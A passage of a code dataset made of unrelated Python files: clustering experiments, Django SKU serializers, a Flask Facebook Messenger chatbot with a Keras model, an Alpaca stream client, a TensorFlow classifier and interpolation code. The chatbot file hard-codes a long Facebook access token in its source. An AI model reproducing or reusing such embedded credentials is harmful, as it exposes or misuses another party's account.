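(see editorial note)\r\n# NOTE (editorial): pandas removed DataFrame.append in 2.0; on current pandas the per-trial rows in these loops would be collected in a plain list of dicts and assembled once with pd.DataFrame(rows).\r\n# MDGMM run. 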
Thresholds use: 0.25 and 0.10\r\n# r = [2, 1]\r\n# k = [2, 1]\r\n\r\n# Small hack to remove\r\ndtype['Pregnancies'] = np.str\r\ny = y.astype(dtype, copy=True)\r\n\r\n\r\nr = np.array([5, 4, 3])\r\nnumobs = len(y)\r\nk = [4, n_clusters]\r\neps = 1E-05\r\nit = 2\r\nmaxstep = 100\r\n\r\nprince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib, seed = None, use_famd = True)\r\nout = M1DGMM(y_np, n_clusters, r, k, prince_init, var_distrib, nj, it, eps, maxstep, seed = None)\r\n\r\nit = 30\r\n\r\nr = out['best_r']\r\nnumobs = len(y)\r\nk = out['best_k']\r\neps = 1E-05\r\nit = 30\r\nmaxstep = 100\r\n\r\nnb_trials= 30\r\nm1dgmm_res = pd.DataFrame(columns = ['it_id', 'micro', 'macro', 'silhouette'])\r\n\r\nfor i in range(nb_trials):\r\n\r\n print(i)\r\n # Prince init\r\n prince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib,\\\r\n seed = None, use_famd = True)\r\n\r\n try:\r\n out = M1DGMM(y_np, n_clusters, r, k, prince_init, var_distrib, nj, it,\\\r\n eps, maxstep, seed = None, perform_selec = False)\r\n m, pred = misc(labels_oh, out['classes'], True) \r\n\r\n sil = silhouette_score(dm, pred, metric = 'precomputed')\r\n micro = precision_score(labels_oh, pred, average = 'micro')\r\n macro = precision_score(labels_oh, pred, average = 'macro')\r\n print(micro)\r\n print(macro)\r\n\r\n m1dgmm_res = m1dgmm_res.append({'it_id': i + 1, 'micro': micro, 'macro': macro, \\\r\n 'silhouette': sil}, ignore_index=True)\r\n except ValueError:\r\n m1dgmm_res = m1dgmm_res.append({'it_id': i + 1, 'micro': np.nan, 'macro': np.nan, \\\r\n 'silhouette': np.nan}, ignore_index=True)\r\n\r\n\r\n\r\nm1dgmm_res.mean()\r\nm1dgmm_res.std()\r\n\r\nm1dgmm_res.to_csv(res_folder + '/m1dgmm_res_famd.csv')\r\n","sub_path":"M1DGMM/test_on_pima.py","file_name":"test_on_pima.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"576825270","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib\nimport numpy as np\nimport librosa\n\n# configure matplotlib so Chinese fonts and minus signs display correctly\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\ntrain = pd.read_csv('evaluation_setup/meta.csv', sep='\\t')\nprint(train.head()) # print the first few rows of the data\nprint(\"Number of training examples=\", train.shape[0], \" Number of classes=\",\n len(train.scene_label.unique())) ## unique() quickly yields the set of classes\n# category_group = train.groupby(['scene_label'], axis=0).count() ## groupby: group the rows by scene_label and count each group's size (fast per-class grouping)\n# print(category_group)\n# groups = train.groupby(['scene_label'], axis=0, sort=True).groups ## the groups attribute yields each group's set of element indices\n# print(groups['airport'])\n\nprint(train.scene_label.value_counts()) # per-class counts on their own\n\n### 2. bar chart of the number of samples per class\n# value_counts = train.scene_label.value_counts() # series\n# print(value_counts.values) # .index gives the class labels, .values the counts\n# plt.plot(value_counts.values, color='red')\n# x = np.arange(10)\n# plt.bar(left=x, height=value_counts.values, width=0.4, alpha=0.8, color='red', label=\"类别\")\n# plt.xticks(x, list(value_counts.index), rotation=90) # label every x position, rotating the labels 90 degrees\n# plt.title('category_statistics')\n# plt.legend()\n# plt.show()\n
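\n# NOTE (editorial): matplotlib 2.0 renamed plt.bar's first keyword from 'left' to 'x', so on current matplotlib the commented bar chart above would start plt.bar(x=x, height=value_counts.values, ...).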
\n### 3. apply() works like Python's built-in map\ntrain['b'] = np.arange(8640)\ntrain['a'] = train['b'].apply(lambda f: f + 2)\nprint(train['a'])\n\n### 4. plot audio\ny,sr=librosa.load('airport-barcelona-0-0-a.wav',sr=48000)\nplt.figure()\nprint(sr*10)\nplt.plot(y,'-')\nplt.show()","sub_path":"src/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"532708423","text":"from django.db import transaction\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import APIException\n\nfrom goods.models import SKUImage, SKU, SKUSpecification, GoodsCategory, SPU, SpecificationOption\nfrom meiduo_mall.utils.fastdfs.fdfs_storage import FastDFSStorage\n\n\n# sku_image = SKUImage.objects.get(id=1)\n# sku_image.sku\nclass SKUImageSerializer(serializers.ModelSerializer):\n \"\"\"SKU image serializer class\"\"\"\n sku_id = serializers.IntegerField(label='SKU商品id')\n\n # nested serialization of the related object\n sku = serializers.StringRelatedField(label='SKU商品名称')\n\n class Meta:\n model = SKUImage\n exclude = ('create_time', 'update_time')\n\n def validate_sku_id(self, value):\n # does a SKU with this sku_id exist?\n try:\n sku = SKU.objects.get(id=value)\n except SKU.DoesNotExist:\n raise serializers.ValidationError('SKU商品不存在')\n\n # return value\n # note: the SKU object found here is what gets returned, so the sku_id\n # fetched from validated_data later is this SKU object\n return sku\n\n # ModelSerializer->update\n def update(self, instance, validated_data):\n # get the uploaded file object\n file = validated_data['image']\n\n # get the SKU object\n sku = validated_data['sku_id']\n\n # upload the image to the FastDFS system\n fdfs = FastDFSStorage()\n try:\n file_id = fdfs.save(file.name, file)\n except Exception:\n # the file upload failed\n raise APIException('上传文件失败')\n\n # update the SKU image record\n instance.sku = sku\n instance.image = file_id\n instance.save()\n\n return instance\n\n # ModelSerializer->create->SKUImage.objects.create()\n def create(self, validated_data):\n # get the uploaded file object\n file = validated_data['image']\n\n # get the SKU object\n sku = validated_data['sku_id']\n\n # upload the image to the FastDFS system\n fdfs = FastDFSStorage()\n try:\n file_id = fdfs.save(file.name, file)\n except Exception:\n # the file upload failed\n raise APIException('上传文件失败')\n\n # save a record for the uploaded image\n sku_image = SKUImage.objects.create(\n sku=sku,\n # sku_id=sku.id,\n image=file_id\n )\n\n # set the SKU's default image if it has none yet\n if not sku.default_image:\n sku.default_image = sku_image.image.url\n sku.save()\n\n return sku_image\n\n\nclass SKUSimpleSerializer(serializers.ModelSerializer):\n \"\"\"SKU (simple) serializer class\"\"\"\n class Meta:\n model = SKU\n fields = ('id', 'name')\n\n\nclass SKUSpecSerializer(serializers.ModelSerializer):\n \"\"\"SKU spec-option serializer class\"\"\"\n spec_id = serializers.IntegerField(label='规格id')\n option_id = serializers.IntegerField(label='选项id')\n\n class Meta:\n model = SKUSpecification\n fields = ('spec_id', 'option_id')\n # read_only\n\n\n# sku = SKU.objects.get(id=1)\n# sku.spu -> the SPU linked to this SKU\n# sku.category -> the third-level category linked to this SKU\n# sku.specs -> the spec-option records linked to this SKU\nclass SKUSerializer(serializers.ModelSerializer):\n \"\"\"SKU serializer class\"\"\"\n # nested serialization of related objects\n spu = serializers.StringRelatedField(label='SPU名称')\n category = serializers.StringRelatedField(label='第三级分类')\n\n spu_id = serializers.IntegerField(label='SPU ID')\n category_id = serializers.IntegerField(label='第三级分类id')\n\n # nested serialization: serialize the related objects with the given serializer\n specs = SKUSpecSerializer(label='SKU规格选项数据', many=True)\n\n class Meta:\n model = SKU\n exclude = ('default_image', 'create_time', 'update_time')\n\n def validate(self, attrs):\n # get category_id\n category_id = attrs['category_id']\n\n try:\n category = 
GoodsCategory.objects.get(id=category_id, subs=None)\n except GoodsCategory.DoesNotExist:\n raise serializers.ValidationError('第三级分类不存在')\n\n # get spu_id\n spu_id = attrs['spu_id']\n\n try:\n spu = SPU.objects.get(id=spu_id)\n except SPU.DoesNotExist:\n raise serializers.ValidationError('SPU不存在')\n\n # check that category_id matches the SPU's category3_id\n if category_id != spu.category3_id:\n raise serializers.ValidationError('第三级分类数据有误')\n\n # check that the SPU's spec data is complete\n spu_specs = spu.specs.all() # fetch the specs linked to the SPU\n spu_specs_count = spu_specs.count()\n\n specs = attrs['specs']\n\n if spu_specs_count != len(specs):\n raise serializers.ValidationError('SKU规格数据不完整')\n\n # check that the SPU's specs match the specs that were passed in\n spu_specs_ids = [spec.id for spec in spu_specs] # [11, 12, 13]\n specs_ids = [spec.get('spec_id') for spec in specs] # [11, 13, 12]\n spu_specs_ids.sort()\n specs_ids.sort()\n if spu_specs_ids != specs_ids:\n raise serializers.ValidationError('SKU规格数据有误')\n\n # check that every option passed in exists under its corresponding SPU spec\n for spec in specs:\n # get spec_id and option_id\n spec_id = spec.get('spec_id')\n option_id = spec.get('option_id') # 3\n\n # get the options under the spec with this spec_id\n options = SpecificationOption.objects.filter(spec_id=spec_id)\n options_ids = [option.id for option in options] # [1, 2, 3]\n\n if option_id not in options_ids:\n raise serializers.ValidationError('规格选项数据有误')\n\n return attrs\n\n # ModelSerializer->create->SKU.objects.create()\n def create(self, validated_data):\n specs = validated_data.pop('specs')\n\n with transaction.atomic():\n # every database operation inside this with block runs in one transaction\n # create the SKU record\n sku = super().create(validated_data)\n\n # create the SKU's spec-option records\n for spec in specs:\n # get spec_id and option_id\n spec_id = spec.get('spec_id')\n option_id = spec.get('option_id')\n\n SKUSpecification.objects.create(\n sku=sku,\n spec_id=spec_id,\n option_id=option_id\n )\n\n return sku\n\n def update(self, instance, validated_data):\n \"\"\"\n instance: the SKU object\n \"\"\"\n specs = validated_data.pop('specs')\n\n with transaction.atomic():\n # update the SKU record\n super().update(instance, validated_data)\n\n # update the SKU's spec-option records\n sku_specs = instance.specs.all()\n\n sku_specs_li = [{\n 'spec_id': spec.spec_id,\n 'option_id': spec.option_id\n }\n for spec in sku_specs]\n\n if specs != sku_specs_li:\n # delete the SKU's existing spec-option records\n sku_specs.delete()\n\n # create the SKU's spec-option records\n for spec in specs:\n # get spec_id and option_id\n spec_id = spec.get('spec_id')\n option_id = spec.get('option_id')\n\n SKUSpecification.objects.create(\n sku=instance,\n spec_id=spec_id,\n option_id=option_id\n )\n\n return instance\n\n\n\n\n\n\n\n\nclass SKUCategorySerializer(serializers.ModelSerializer):\n \"\"\"Category serializer class\"\"\"\n class Meta:\n model = GoodsCategory\n fields = ('id', 'name')\n\n","sub_path":"meiduo_mall/meiduo_mall/apps/meiduo_admin/serializers/skus.py","file_name":"skus.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"396951965","text":"#https://hackernoon.com/beginners-guide-simple-chat-bot-fb-based-on-flask-and-heroku-2g7v32ab\nimport random\nfrom flask import Flask, request\nfrom pymessenger.bot import Bot\n\n#from tensorflow import keras\nfrom keras.models import load_model, Model\nfrom keras.layers import Input, LSTM, Dense\nfrom keras.models import model_from_json\nimport re\nimport numpy as np\n\napp = Flask(__name__) # Initializing our Flask application\n
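# NOTE (editorial): page tokens are secrets; in a real deployment they would come from the environment, e.g. os.environ.get('FB_ACCESS_TOKEN') (variable name assumed), rather than being hard-coded.\nACCESS_TOKEN = 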
'EABFdZAPLvVmIBAGkF62UZAtDRDlcicSvSvkqGYap8aynfCdmtg5F7mfimBFHaKlwMA8SBOwemeRlcnlvaW8W9AIa6JsDu6fylppTo16J5fXuDDuiJZCueiYEOCBpAs1m3Hy0PxwJdzm7oLZBeUmbq6yu0KK8BZBsegDJCjunaNwZDZD'\nVERIFY_TOKEN = 'EABFdZAPLvVmIBAGkF62UZAtDRDlcicSvSvkqGYap8aynfCdmtg5F7mfimBFHaKlwMA8SBOwemeRlcnlvaW8W9AIa6JsDu6fylppTo16J5fXuDDuiJZCueiYEOCBpAs1m3Hy0PxwJdzm7oLZBeUmbq6yu0KK8BZBsegDJCjunaNwZDZDAS'\nbot = Bot(ACCESS_TOKEN)\n\ndef load_full_model(training_model):\n \n data_path = \"preguntas7.txt\"\n data_path2 = \"respuestas7.txt\"\n with open(data_path.encode('utf-8'), 'r') as f:\n lines = f.read().split('\\n')\n with open(data_path2.encode('utf-8'), 'r') as f:\n lines2 = f.read().split('\\n')\n lines = [re.sub(r\"\\[\\w+\\]\",'hi',line) for line in lines]\n lines = [\" \".join(re.findall(r\"\\w+\",line)) for line in lines]\n lines2 = [re.sub(r\"\\[\\w+\\]\",'',line) for line in lines2]\n lines2 = [\" \".join(re.findall(r\"\\w+\",line)) for line in lines2]\n # Grouping lines by response pair\n pairs = list(zip(lines,lines2))\n #random.shuffle(pairs)\n\n input_docs = []\n target_docs = []\n input_tokens = set()\n target_tokens = set()\n for line in pairs[:]:\n input_doc, target_doc = line[0], line[1]\n # Appending each input sentence to input_docs\n input_docs.append(input_doc)\n # Splitting words from punctuation \n target_doc = \" \".join(re.findall(r\"[\\w']+|[^\\s\\w]\", target_doc))\n # Redefine target_doc below and append it to target_docs\n target_doc = ' ' + target_doc + ' '\n target_docs.append(target_doc)\n \n # Now we split up each sentence into words and add each unique word to our vocabulary set\n for token in re.findall(r\"[\\w']+|[^\\s\\w]\", input_doc):\n if token not in input_tokens:\n input_tokens.add(token)\n for token in target_doc.split():\n if token not in target_tokens:\n target_tokens.add(token)\n \n input_tokens = sorted(list(input_tokens))\n target_tokens = sorted(list(target_tokens))\n \n global num_encoder_tokens\n global num_decoder_tokens\n\n num_encoder_tokens = len(input_tokens)\n num_decoder_tokens = len(target_tokens)\n \n global input_features_dict\n global target_features_dict\n\n input_features_dict = dict(\n [(token, i) for i, token in enumerate(input_tokens)])\n target_features_dict = dict(\n [(token, i) for i, token in enumerate(target_tokens)])\n \n global reverse_input_features_dict\n global reverse_target_features_dict\n\n reverse_input_features_dict = dict(\n (i, token) for token, i in input_features_dict.items())\n reverse_target_features_dict = dict(\n (i, token) for token, i in target_features_dict.items())\n \n \n global max_decoder_seq_length\n global max_encoder_seq_length\n max_encoder_seq_length = max([len(re.findall(r\"[\\w']+|[^\\s\\w]\", input_doc)) for input_doc in input_docs])\n max_decoder_seq_length = max([len(re.findall(r\"[\\w']+|[^\\s\\w]\", target_doc)) for target_doc in target_docs])\n \n encoder_input_data = np.zeros(\n (len(input_docs), max_encoder_seq_length, num_encoder_tokens),\n dtype='float32')\n decoder_input_data = np.zeros(\n (len(input_docs), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\n decoder_target_data = np.zeros(\n (len(input_docs), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\n\n for line, (input_doc, target_doc) in enumerate(zip(input_docs, target_docs)):\n for timestep, token in enumerate(re.findall(r\"[\\w']+|[^\\s\\w]\", input_doc)):\n #Assign 1. 
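(see note)\n # NOTE (editorial): this builds the usual one-hot teacher-forcing tensors for a seq2seq model; decoder_target_data is decoder_input_data shifted one timestep to the left.\n #Assign 1. 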
for the current line, timestep, & word in encoder_input_data\n encoder_input_data[line, timestep, input_features_dict[token]] = 1.\n\n for timestep, token in enumerate(target_doc.split()):\n decoder_input_data[line, timestep, target_features_dict[token]] = 1.\n if timestep > 0:\n decoder_target_data[line, timestep - 1, target_features_dict[token]] = 1.\n \n dimensionality = 256\n\n #Encoder\n encoder_inputs = Input(shape=(None, num_encoder_tokens))\n encoder_lstm = LSTM(dimensionality, return_state=True)\n encoder_outputs, state_hidden, state_cell = encoder_lstm(encoder_inputs)\n encoder_states = [state_hidden, state_cell] \n \n #Decoder\n decoder_inputs = Input(shape=(None, num_decoder_tokens))\n decoder_lstm = LSTM(dimensionality, return_sequences=True, return_state=True)\n decoder_outputs, decoder_state_hidden, decoder_state_cell = decoder_lstm(decoder_inputs, initial_state=encoder_states)\n decoder_dense = Dense(num_decoder_tokens, activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n \n #Load the model\n encoder_inputs = training_model.input[0]\n encoder_outputs, state_h_enc, state_c_enc = training_model.layers[2].output\n encoder_states = [state_h_enc, state_c_enc]\n\n global encoder_model\n\n encoder_model = Model(encoder_inputs, encoder_states)\n\n latent_dim = 256\n decoder_state_input_hidden = Input(shape=(latent_dim,))\n decoder_state_input_cell = Input(shape=(latent_dim,))\n decoder_states_inputs = [decoder_state_input_hidden, decoder_state_input_cell]\n decoder_outputs, state_hidden, state_cell = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)\n decoder_states = [state_hidden, state_cell]\n decoder_outputs = decoder_dense(decoder_outputs)\n \n global decoder_model\n \n decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)\n \n#Method to convert user input into a matrix\ndef string_to_matrix(user_input):\n tokens = re.findall(r\"[\\w']+|[^\\s\\w]\", user_input)\n user_input_matrix = np.zeros(\n (1, 12, 356),\n dtype='float32')\n for timestep, token in enumerate(tokens):\n if token in input_features_dict:\n user_input_matrix[0, timestep, input_features_dict[token]] = 1.\n return user_input_matrix\n \n#Method that will create a response using seq2seq model we built\ndef generate_response(user_input):\n input_matrix = string_to_matrix(user_input)\n chatbot_response = decode_response(input_matrix)\n #Remove and tokens from chatbot_response\n chatbot_response = chatbot_response.replace(\"\",'')\n chatbot_response = chatbot_response.replace(\"\",'')\n return chatbot_response\n\n\n#KERAS MODEL\ndef decode_response(test_input):\n #Getting the output states to pass into the decoder\n states_value = encoder_model.predict(test_input)\n #Generating empty target sequence of length 1\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n #Setting the first token of target sequence with the start token\n target_seq[0, 0, target_features_dict['']] = 1.\n \n #A variable to store our response word by word\n decoded_sentence = ''\n \n stop_condition = False\n while not stop_condition:\n #Predicting output tokens with probabilities and states\n output_tokens, hidden_state, cell_state = decoder_model.predict([target_seq] + states_value)\n #Choosing the one with highest probability\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_token = reverse_target_features_dict[sampled_token_index]\n decoded_sentence += \" \" + sampled_token\n #Stop if hit max length or found the stop token\n if 
(sampled_token == '' or len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n #Update the target sequence\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n #Update states\n states_value = [hidden_state, cell_state]\n return decoded_sentence\n\n\n# Importing standard route and two requst types: GET and POST.\n# We will receive messages that Facebook sends our bot at this endpoint\n@app.route('/', methods=['GET', 'POST'])\ndef receive_message():\n if request.method == 'GET':\n # Before allowing people to message your bot Facebook has implemented a verify token\n # that confirms all requests that your bot receives came from Facebook.\n token_sent = request.args.get(\"hub.verify_token\")\n return verify_fb_token(token_sent)\n # If the request was not GET, it must be POSTand we can just proceed with sending a message\n # back to user\n else:\n # get whatever message a user sent the bot\n output = request.get_json()\n for event in output['entry']:\n messaging = event['messaging']\n for message in messaging:\n if message.get('message'):\n # Facebook Messenger ID for user so we know where to send response back to\n recipient_id = message['sender']['id']\n if message['message'].get('text'):\n response_sent_text = get_message()\n send_message(recipient_id, response_sent_text)\n # if user send us a GIF, photo, video or any other non-text item\n if message['message'].get('attachments'):\n response_sent_text = get_message()\n send_message(recipient_id, response_sent_text)\n return \"Message Processed\"\n\n\ndef verify_fb_token(token_sent):\n # take token sent by Facebook and verify it matches the verify token you sent\n # if they match, allow the request, else return an error\n if token_sent == VERIFY_TOKEN:\n return request.args.get(\"hub.challenge\")\n return 'Invalid verification token'\n\n\ndef get_message():\n sample_responses = [\"You are stunning!\", \"We're proud of you\",\n \"Keep on being you!\", \"We're greatful to know you :)\"]\n # return selected item to the user\n return random.choice(sample_responses)\n\n\n# Uses PyMessenger to send response to the user\ndef send_message(recipient_id, response):\n # sends user the text message provided via input response parameter\n bot.send_text_message(recipient_id, response)\n return \"success\"\n\n#load model #1\nchatbotmodel = load_model('training_model.h5')\nload_full_model(chatbotmodel)\n\n# Add description here about this if statement.\nif __name__ == \"__main__\":\n #load the model\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"310259115","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 2 20:37:37 2021\r\n\r\n@author: sundeep singh\r\n\r\n\"\"\"\r\n\r\n#imports\r\n\r\nimport asyncio\r\nimport sys\r\nimport pathlib\r\nimport sys\r\nimport os\r\nimport pathlib\r\nimport time\r\nsys.path.append(str(pathlib.Path(__file__).resolve().parents[3]))\r\nimport nest_asyncio\r\nimport app.config as Config\r\nfrom alpaca_trade_api.rest import REST\r\nfrom alpaca_trade_api.stream import Stream\r\nfrom alpaca_trade_api.common import URL\r\nimport logging\r\nimport logging.config\r\n\r\n#log's info\r\nlogging.config.fileConfig(Config.LOG_CONF_FILE,disable_existing_loggers=False)\r\nlogger=logging.getLogger(\"alpacastream\")\r\n\r\nclass AlpacaDataStream:\r\n \r\n def __init__(self):\r\n 
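# Alpaca credentials are exported as environment variables; alpaca_trade_api's REST and Stream clients read the APCA_* variables implicitly.\r\n 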
os.environ[\"APCA_API_KEY_ID\"]=Config.ALPACA_API_KEY\r\n os.environ[\"APCA_API_SECRET_KEY\"]=Config.ALPACA_SECRET_KEY\r\n os.environ[\"APCA_API_BASE_URL\"]=Config.ALPACA_API_URL\r\n self._conn=None\r\n\r\n\r\n #gets the market open time stamp\r\n def get_market_clock(self):\r\n\r\n try:\r\n obj=REST()\r\n clk=obj.get_clock()\r\n return clk\r\n\r\n except Exception as e:\r\n return ConnectionError\r\n\r\n\r\n \r\n \r\n # gets streams\r\n def get_streams(self,feed,channels,symbols,handlers):\r\n\r\n try:\r\n self._conn = Stream(data_feed=feed,raw_data=True)\r\n\r\n except Exception as e:\r\n\r\n logger.exception(\"some error in streaming \")\r\n\r\n \r\n\r\n \r\n \r\n \r\n if \"bars\" in channels:\r\n self._conn.subscribe_bars(handlers[\"bars\"],*symbols)\r\n \r\n\r\n \r\n \r\n if \"trades\" in channels:\r\n\r\n\r\n self._conn.subscribe_trade_updates(handlers[\"trades\"])\r\n self._conn.subscribe_trades(handlers[\"trades_update\"],*symbols)\r\n \r\n if \"quotes\" in channels:\r\n self._conn.subscribe_quotes(handlers[\"quotes\"],*symbols)\r\n \r\n \r\n \r\n \r\n try:\r\n\r\n logger.info(\"connecting to alpaca server\")\r\n res=self._conn.run()\r\n\r\n \r\n\r\n \r\n \r\n logger.info(\"connection to alpaca server terminated\")\r\n \r\n print(\"connection established with alpaca server\")\r\n \r\n except Exception as e:\r\n\r\n logger.exception(\"some error connecting to server check logs\")\r\n \r\n raise e\r\n\r\n finally:\r\n print(\"Trying to re-establish connection\")\r\n time.sleep(5)\r\n res=self._conn.run()\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n ","sub_path":"app/providers/Alpaca/AlpacaDataStream.py","file_name":"AlpacaDataStream.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"525806240","text":"class Solution:\n def getMines(self, board, row, column):\n # Time Complexity: O(mn)\n # Space Complexity: O(mn)\n dirs = [[0,1],[0,-1],[1,0],[-1,0],[1,1],[-1,-1],[1,-1],[-1,1]]\n o=0\n for i in dirs:\n r = row + i[0]\n c = column + i[1]\n if(r>=0 and r<len(board) and c>=0 and c<len(board[0]) and board[r][c]==\"M\"):\n o+=1\n return o\n\n def updateBoard(self, board: List[List[str]], click: List[int]) -> List[List[str]]:\n if(board==None or len(board)==0):\n return board\n \n dirs = [[0,1],[0,-1],[1,0],[-1,0],[1,1],[-1,-1],[1,-1],[-1,1]]\n \n # base case\n \n if(board[click[0]][click[1]]==\"M\"):\n board[click[0]][click[1]]=\"X\"\n return board\n \n q = deque([])\n board[click[0]][click[1]]='B'\n q.append([click[0],click[1]])\n while(len(q)>0):\n curr = q.popleft()\n mines = self.getMines(board,curr[0],curr[1])\n if(mines==0):\n for dir in dirs:\n r = curr[0] + dir[0]\n c = curr[1] + dir[1]\n if(r>=0 and r=0 and c array (the folder names inside the training folder) [name1, name2, name3]\r\n label_lines = [line.rstrip() for line \r\n in tf.gfile.GFile(\"tf_files/retrained_labels.txt\")] \r\n\r\n\r\n \t\t\t\t \r\n # read in the graph; it was trained via train.sh -> call retrain.py\r\n with tf.gfile.FastGFile(\"tf_files/retrained_graph.pb\", 'rb') as f:\r\n \r\n graph_def = tf.GraphDef()\t## The graph-graph_def is a saved copy of a TensorFlow graph; object initialization\r\n graph_def.ParseFromString(f.read())\t#Parse serialized protocol buffer data into variable\r\n _ = tf.import_graph_def(graph_def, name='')\t# import a serialized TensorFlow GraphDef protocol buffer, extract objects in the GraphDef as tf.Tensor\r\n \t\r\n \t#https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/inception.py ; from line 276 onwards\r\n\r\n with tf.Session() as sess:\r\n\r\n 
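# (editorial note) this is the TensorFlow 1.x Session/GraphDef API; under TensorFlow 2 the script would need the tf.compat.v1 shims plus disable_eager_execution(), assuming the same retrained_graph.pb.\r\n 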
softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\r\n \t# return: Tensor(\"final_result:0\", shape=(?, 4), dtype=float32); string name defined in retrain.py, line 1064 \r\n \r\n predictions = sess.run(softmax_tensor, \\\r\n {'DecodeJpeg/contents:0': image_data})\r\n #print(predictions) # [[0.0083019 0.0825651 0.90913296]]\r\n # returns the prediction values as an array:\r\n \t\r\n top_k = predictions[0].argsort()[-len(predictions[0]):][::-1]\r\n \t# sorting; circle -> 0, plus -> 1, square -> 2, triangle -> 3; example return [3 1 2 0] -> sorted by strongest match\r\n\r\n \t# output\r\n\r\n for node_id in top_k:\r\n human_string = label_lines[node_id]\r\n score = predictions[0][node_id]\r\n \r\n if( score > 0.7):\r\n print(image_path+\"FUCKING THE FACE OUT !!!!\")\r\n print('%s (score = %.5f)' % (human_string, score))\r\n break","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"555261930","text":"import sympy\nfrom math import log2\nimport matplotlib.pyplot as plt\nfrom sympy import diff, symbols\nfrom sympy.solvers import solve\nfrom sympy.parsing.sympy_parser import parse_expr\nimport numpy as np\n\nn = [1, 2, 5, 10, 20, 100]\n\n\ndef f(x):\n return log2(3 + x)\n\n\ndef fact(n):\n res = 1\n\n for i in range(2, n + 1):\n res *= i\n\n return res\n\n\ndef Qnk(k, x, nodes):\n res = 1\n\n for i in range(len(nodes)):\n if i == k:\n continue\n\n res *= (x - nodes[i]) / (nodes[k] - nodes[i])\n\n return res\n\n\ndef Pn(x, nodes):\n res = 0\n\n for k in range(len(nodes)):\n res += f(nodes[k]) * Qnk(k, x, nodes)\n\n return res\n\n\ndef U(x, nodes):\n res = 1\n\n for i in range(len(nodes)):\n res *= (x - nodes[i])\n\n return res\n\n\ndef main(points, nodes):\n for i in range(len(nodes)):\n y = [Pn(p, nodes[i]) for p in points]\n plt.plot(points, y, label='n = {}'.format(n[i]))\n plt.xlabel(\"x\")\n plt.ylabel(\"Pn(x)\")\n plt.title(\"Polinom\")\n plt.legend()\n plt.show()\n\n\ndef errors(points, nodes):\n x = symbols('x')\n f = parse_expr(\"log2(3 + x)\", local_dict={\"log2\": lambda x: sympy.log(x, 2)})\n for i in range(len(nodes)):\n d = diff(f, x, n[i] + 1)\n y = [(d.subs(x, p) * U(p, nodes[i])) / fact(n[i] + 1) for p in points]\n plt.plot(points, y, label='n = {}'.format(n[i]))\n plt.title(\"Errors\")\n plt.legend()\n plt.show()\n\n\ndef analitically(n, a, b, nodes):\n x = symbols('x')\n f = parse_expr(\"log2(3 + x)\", local_dict={\"log2\": lambda x: sympy.log(x, 2)})\n f = diff(f, x, n + 1)\n\n critical_points = solve(diff(f, x), x)\n critical_points.extend([a, b])\n\n M_max = max(map(lambda val: abs(f.subs(x, val)), critical_points))\n U = 1\n\n for i in range(len(nodes)):\n U *= (x - nodes[i])\n\n critical_points = solve(diff(U, x), x)\n critical_points.extend([a, b])\n\n U_max = max(map(lambda val: abs(U.subs(x, val)), critical_points))\n alpha = (M_max * U_max) / fact(n + 1)\n return alpha\n\n\nif __name__ == '__main__':\n a, b = -1, 1\n h = [(b - a) / n[i] for i in range(len(n))]\n points = np.linspace(a, b, num=10)\n nodes = []\n\n for i in range(len(n)):\n row = [a]\n for j in range(1, n[i] + 1):\n row.append(row[j - 1] + h[i])\n nodes.append(row)\n\n main(points, nodes)\n errors(points, nodes)\n print(analitically(n[3], a, b, nodes[3]))\n","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"392033180","text":"fname = input(\"Enter file:\")\r\nif len(fname) < 1 : fname = \"mbox-short.txt\"\r\nfh=open(fname)\r\ndict=dict()\r\nfor line in fh:\r\n line=line.rstrip()\r\n if line.startswith(\"From \") :\r\n wds=line.split()\r\n #print(wds)\r\n t=wds[5]\r\n #print(t)\r\n hrs=t[:2]\r\n #print(hrs)\r\n dict[hrs]=dict.get(hrs,0)+1\r\n#for k,v in sorted (dict.items()) :\r\n #print(k,v)\r\n","sub_path":"files_5/files_5.py","file_name":"files_5.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"210734538","text":"import sqlite3\nimport time\nfrom setup import *\nfrom saleInfo import *\n\ndef list_product(cursor, connection, email):\n # This function executes a query that gets all the products associated to active sales! -> Then provides further instructions to the user for actions that they can perform\n\n \n\n listProduct_query = ''' SELECT distinct p.pid, p.descr, COUNT(pr.rtext), AVG(pr.rating), COUNT(distinct s.sid)\n 